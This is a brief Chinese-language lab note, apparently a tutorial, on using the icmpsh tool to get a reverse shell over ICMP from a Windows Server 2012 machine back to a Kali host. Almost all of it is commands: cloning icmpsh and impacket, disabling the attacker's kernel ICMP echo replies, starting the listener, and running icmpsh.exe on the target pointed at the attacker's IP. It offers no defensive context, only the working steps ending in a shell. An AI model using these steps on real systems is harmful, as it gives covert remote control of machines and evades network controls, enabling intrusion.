https://github.com/bdamele/icmpsh
kali:192.168.100.85 win2012:192.168.100.10 安装pip 使用get-pip.py
安装icmpsh sudo git clone https://github.com/inquisb/icmpsh.git
安装impacket sudo git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
sudo python setup.py install
关闭本机的icmp应答,防止内核对自己的ping包响应 sysctl -w net.ipv4.icmp_echo_ignore_all=1
sudo python2 icmpsh_m.py 192.168.100.85 192.168.100.10
icmpsh_m.py [本机IP] [目标IP]
目标机器执行icmpsh.exe -t 192.168.100.85
成功反弹shell
|